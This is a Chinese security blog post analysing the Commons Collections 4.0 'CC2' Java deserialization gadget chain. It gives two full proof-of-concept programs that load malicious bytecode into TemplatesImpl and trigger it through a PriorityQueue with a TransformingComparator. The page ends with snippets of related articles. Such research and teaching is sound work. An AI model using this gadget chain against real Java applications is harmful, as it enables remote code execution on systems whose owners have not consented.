CC2利用链分析

已于 2024-07-10 13:57:09 修改
阅读量457 收藏 7
点赞数 6
分类专栏: Java反序列化 文章标签: Java反序列化 java
于 2024-07-08 17:50:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45436292/article/details/140275286
版权

分析版本

Commons Collections 4.0

JDK 8u65

环境配置参考JAVA安全初探(三):CC1链全分析

分析过程

CC2是在CC4的基础上做了一点改动,和之前CC3结合CC1 InvokerTransformer一样的。CC3利用链分析

因为TemplatesImpl是可序列化的,利用反射把TemplatesImpl参数控制好之后,直接用InvokerTransformer执行TemplatesImpl.newTransformer,就可以调用defineClass,实现任意命令执行了。(不再使用TrAXFilter)

image-20240708153515226

更新Poc

public class cc2 {
    public static void main(String[] args) throws Exception {
        //CC2
        byte[] code = Files.readAllBytes(Paths.get("G:\\Java反序列化\\class_test\\Test.class"));
        byte[][] codes = {code};
        TemplatesImpl templates = new TemplatesImpl();
        Class templatesClass = templates.getClass();
        Field name = templatesClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates, "pass");

        Field bytecodes = templatesClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templates, codes);

        Field tfactory = templatesClass.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates, new TransformerFactoryImpl());


        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer",null, null)
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        //chainedTransformer.transform(1);

        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1)); //改为ConstantTransformer,把利用链断掉
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);

        priorityQueue.add(1);
        priorityQueue.add(1);

        ///Class transformingComparatorClass = TransformingComparator.class;  //也可以
        Class transformingComparatorClass = transformingComparator.getClass();
        Field transformer = transformingComparatorClass.getDeclaredField("transformer");
        transformer.setAccessible(true);
        transformer.set(transformingComparator, chainedTransformer);

        //cc4.serialize(priorityQueue);
        cc4.unserialize("ss.ser");

    }
}

补充

关于templates传入还有一种方法就是不用new ConstantTransformer(templates)传值,而是用priorityQueue.add(templates);

public class cc2 {
    public static void main(String[] args) throws Exception {
        //CC2
        byte[] code = Files.readAllBytes(Paths.get("G:\\Java反序列化\\class_test\\Test.class"));
        byte[][] codes = {code};
        TemplatesImpl templates = new TemplatesImpl();
        Class templatesClass = templates.getClass();
        Field name = templatesClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates, "pass");

        Field bytecodes = templatesClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templates, codes);

        Field tfactory = templatesClass.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates, new TransformerFactoryImpl());

        InvokerTransformer<Object, Object> invokerTransformer = new InvokerTransformer<>("newTransformer", null, null);

        //chainedTransformer.transform(1);

        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1)); //改为ConstantTransformer,把利用链断掉
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);

        priorityQueue.add(templates);
        priorityQueue.add(1);


        ///Class transformingComparatorClass = TransformingComparator.class;  //也可以
        Class transformingComparatorClass = transformingComparator.getClass();
        Field transformer = transformingComparatorClass.getDeclaredField("transformer");
        transformer.setAccessible(true);
        transformer.set(transformingComparator, invokerTransformer);

        //cc4.serialize(priorityQueue);
        cc4.unserialize("ss.ser");

    }
}

priorityQueue.add(templates);会执行到下图方法

此方法是直接给transformer方法参数传值templates(CC1中ConstantTransformer的引入是为了解决无法给InvokerTransformer方法传值的问题,而这里是可以控制传值,所以我们可以不用ConstantTransformer)

image-20240708170653485

image-20240708173755568

还存在一个问题如果,Poc这样传值会发现,无法弹出计算器

    priorityQueue.add(1);
    priorityQueue.add(templates);

可以对比上图正确的Poc,下图代码执行时去找1的newTransformer方法,找不到抛出了错误。在执行第二行代码之前,程序就结束了。

image-20240708174011165

2tu.cc 网站模板 精选
04-02
这意味着用户不仅可以利用模板构建视觉上与2tu.cc类似的网站,还能通过提供的采集规则自动化地获取或更新网站内容。数据采集通常涉及到网络爬虫技术,这是一种从互联网上抓取信息的程序,可能涉及HTML解析、正则...
cc链2(小宇特详解)
小宇的web博客
02-19 3895
cc链2(小宇特详解) 漏洞环境 jdk8u71 apache commons collection-4.0 与cc链1的区别 cc链2利用链中使用了动态字节码编程来构造poc cc链2没有使用反序列化漏洞 cc链利用流程 构造一个TestTemplatesImpl恶意类转成字节码,然后通过反射将恶意类的字节码注入到TemplatesImpl对象的_bytecodes属性(构造利用核心代码) 创建一个InvokerTransformer并传递一个newTransformer方法,然后将Invoker
Java安全研究——反序列化漏洞之CC2
weixin_43889136的博客
05-10 1661
0x01
CC2链分析
sunyufei_666的博客
08-11 145
所以可以采用CC1方法,在对象实例化的时候不添加comparator对象,添加玩元素后再通过反射传入comparator对象,这样没有comparator对象后,siftUp方法执行后会进入siftUpComparable方法,这里不会调用compare方法,可以避免触发调用计算器。这两个方法都会调用compare方法,只是第一个方法是 key对象进行调用,第二个方法是comparator对象调用。该类是类转换比较器,构造器中存放Transfomer,compare方法中调用了transform。
Java安全学习笔记--反序列化漏洞利用CC2
m0_64685672的博客
01-18 1119
测试环境 jdk1.8(jdk8u71) apache common cellection 4.0 预备知识简述 Javassist动态字节码编程 字节码技术可以动态改变某个类的结构(添加/删除/修改新的属性/方法) 关于字节码的框架有javassist,asm,bcel等,javassist相对简单不需要掌握字节码指令相关知识即可使用。 几个关键的类: ClassPool:ClassPool 类可以控制的类的字节码,例如创建一个类或加载一个类,是CtClass对象集合的容器。一旦C..
Java安全 CC链2分析
Elite的博客
03-16 1238
CC2链适用于Apache common collection 4.0版本,由于该版本对AnnotationInvocationHandler类的readObject方法进行了修复,导致cc链1无法使用,故产生了cc链2,cc链2与cc链3相似,都使用了字节码的加载,并且后续的触发链也基本相同
sub-funix-cc2
03-07
2. **C/C++编译原理**:项目涉及编译器构造,需要理解词法分析、语法分析、语义分析、中间代码生成、优化以及目标代码生成等编译过程。 3. **编译器设计**:可能涉及到自定义编译器前端,处理特定的语法特性,或者...
基于CC2530的光敏传感器
01-24
光敏传感器,也称为光强传感器或光电传感器,其工作原理是利用光的物理性质,如强度、颜色等,将其转化为电信号。这种传感器通常包含一个光敏元件,如光敏电阻(LDR)或光二极管,当接收到光线时,其电阻值或电流会...
CC2430相关资源下载链接
02-25
- **Low-Power RF Guide** 提供了关于如何利用CC2430进行低功耗无线设计的指南。 - **Zigbee Overview Brochure** 介绍了Zigbee技术的基本概念,帮助开发者理解其工作原理。 - **Communications Infrastructure ...
adcbufcontinuous_CC2650_LAUNCHXL_TI_CC2650F128_CC2650-SensorTag_
09-30
5. **源代码编程**:压缩包内的源代码很可能是用C或C++编写,遵循特定的嵌入式系统编程范例,利用TI提供的SDK和工具链进行编译和调试。 6. **应用示例**:例如,SensorTag是一个流行的开发套件,用于展示CC2650的...
Commons-Collections篇-CC2链分析
最新发布
鸣蜩十四的博客
06-17 920
CC2链主要和CC4一样,但是区别在于CC2避免了使用Transformer数组,没有使用InstantiateTransformer类进行初始化,主要分析中间连接部分也就是CC2链重心。
[Java安全入门]六.CC2+CC4+CC5+CC7
qq_34942239的博客
03-21 1359
与前面几条cc不同的是,cc2的依赖是4.0版本,并且解决了高版本无法使用AnnotationInvocationHandler类的弊端。cc2使用javassist和PriorityQueue来构造链。
【Web】Java反序列化CC2——commons-collections4的新链之一
uuzeray的博客
03-01 657
而siftDownUsingComparator内部会调用构造方法传入的comparator的compare方法,此时我们只要令comparator为TransformingComparator即可完成利用链的调用。API 设计:commons-collections4 重新设计了 API,并且引入了一些新的功能和改进,同时也修复了一些旧版本中存在的 bug。安全性增强:commons-collections4 引入了更多的安全性措施,以防止常见的安全漏洞。最后调用了heapify方法。
CC2链分析与复现
weixin_42974824的博客
08-25 1055
CC2链分析与复现
commons-collections2(cc2)反序列化链分析
遇事不决冲冲冲
02-16 3282
大的思路是将恶意参数放到`TemplatesImpl`类中的`_bytecodes`属性中,反射构造`PriorityQueue`队列的`comparator`和`queue`两个字段,将`PriorityQueue`队列的`comparator`字段设置为`TransformingComparator`(创建一个`InvokerTransformer`并传递一个`newTransformer`方法,然后将`InvokerTransformer`方法名传递给`TransformingComparator`)
Java反序列化漏洞——CommonsCollections4.0版本—CC2、CC4
Thunderclap的博客
02-18 1742
因为这条利⽤链中的关键类org.apache.commons.collections4.comparators.TransformingComparator ,在commonscollections4.0以前是版本中是没有实现Serializable 接⼝的,⽆法在序列化中使⽤。实际上是可用的,比如CC6的链,引入的时候因为⽼的Gadget中依赖的包名都是org.apache.commons.collections ,⽽新的包名已经变。其他的代码不需要改变,即可创建出新版本下的利用链。
Java反序列化-CC2、4分析
The_W0rld的博客
07-22 1362
CC2中,使用的将不是前面的commons-collections依赖了,而是commons-collections4这个依赖,并且也采取了一下新的利用类PriorityQueue和TransformingComparator。通过PriorityQueue做为入口点,TransformingComparator作为跳板去触发利用链。...
8-java安全——java反序列化CC2链分析
网络安全
07-19 2895
上一篇分析了CC1链,本篇继续分析ysoserial工具的 apache commons collections 2利用链。 CC1链在实际利用过程存在一些限制,例如jdk1.8版本以上已经无法利用反序列化漏洞了,通过分析发现jdk8u181版本中改写了sun.reflect.annotation.AnnotationInvocationHandler类的readObject方法,CC1链在jdk8版本以上已经被修复了,因此jdk8版本以上重新构造了一条新的利用链(CC2链)。 不过CC2链使用
9-java安全——关于构造CC2链的几个问题
网络安全
07-23 535
思考一下:CC2链的poc利用代码中为什么要向queue队列中添加至少2个元素?并且PriorityQueue队列中的queue属性被transient关键字修饰具有“不会序列化”语义,在反序列化过程中为什么还能从流中读取queue的数据,流中的数据又从何而来? readObject方法是怎么从流中读取queue的数据 使用SerializationDumper工具解析对象序列化的数据,Fields字段中并没有看到PriorityQueue的queue属性,说明queue确实没有参与序列化.
cc-shellcoding源码分析与应用
资源摘要信息:"cc-shellcoding-源码.rar" 知识点一:源码概念 源码是计算机程序的原始代码,它以文本形式存在,包含程序员为实现特定功能而编写的指令和注释。程序员通过编写源码来创建可执行程序,这些程序在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值